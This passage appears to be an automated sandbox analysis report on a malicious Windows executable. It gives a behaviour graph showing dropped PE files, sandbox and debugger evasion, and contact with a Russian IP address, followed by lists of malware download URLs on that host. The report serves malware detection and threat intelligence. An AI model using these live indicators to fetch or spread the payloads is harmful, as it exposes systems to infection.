Source: Yara match File source: 00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1565422 Sample: file.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 26 Found malware configuration 2->26 28 Malicious sample detected (through community Yara rule) 2->28 30 Multi AV Scanner detection for dropped file 2->30 32 6 other signatures 2->32 6 file.exe 33 2->6         started        process3 dnsIp4 24 185.156.72.65, 49700, 80 ITDELUXE-ASRU Russian Federation 6->24 14 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 6->14 dropped 16 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 6->16 dropped 18 C:\Users\user\AppData\Local\...\soft[1], PE32 6->18 dropped 20 C:\Users\user\AppData\Local\...\dll[1], PE32 6->20 dropped 34 Detected unpacking (changes PE section rights) 6->34 36 Tries to detect sandboxes and other dynamic analysis tools (window names) 6->36 38 Tries to evade debugger and weak emulator (self modifying code) 6->38 40 5 other signatures 6->40 11 WerFault.exe 21 16 6->11         started        file5 signatures6 process7 file8 22 C:\ProgramData\Microsoft\...\Report.wer, Unicode 11->22 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.156.72.65
 unknown Russian Federation
44636 ITDELUXE-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.156.72.65/soft/download false
    		high
    http://185.156.72.65/dll/download false
      		high
      http://185.156.72.65/dll/key false
        		high
        http://185.156.72.65/files/download false
          		high
          http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub false
            		high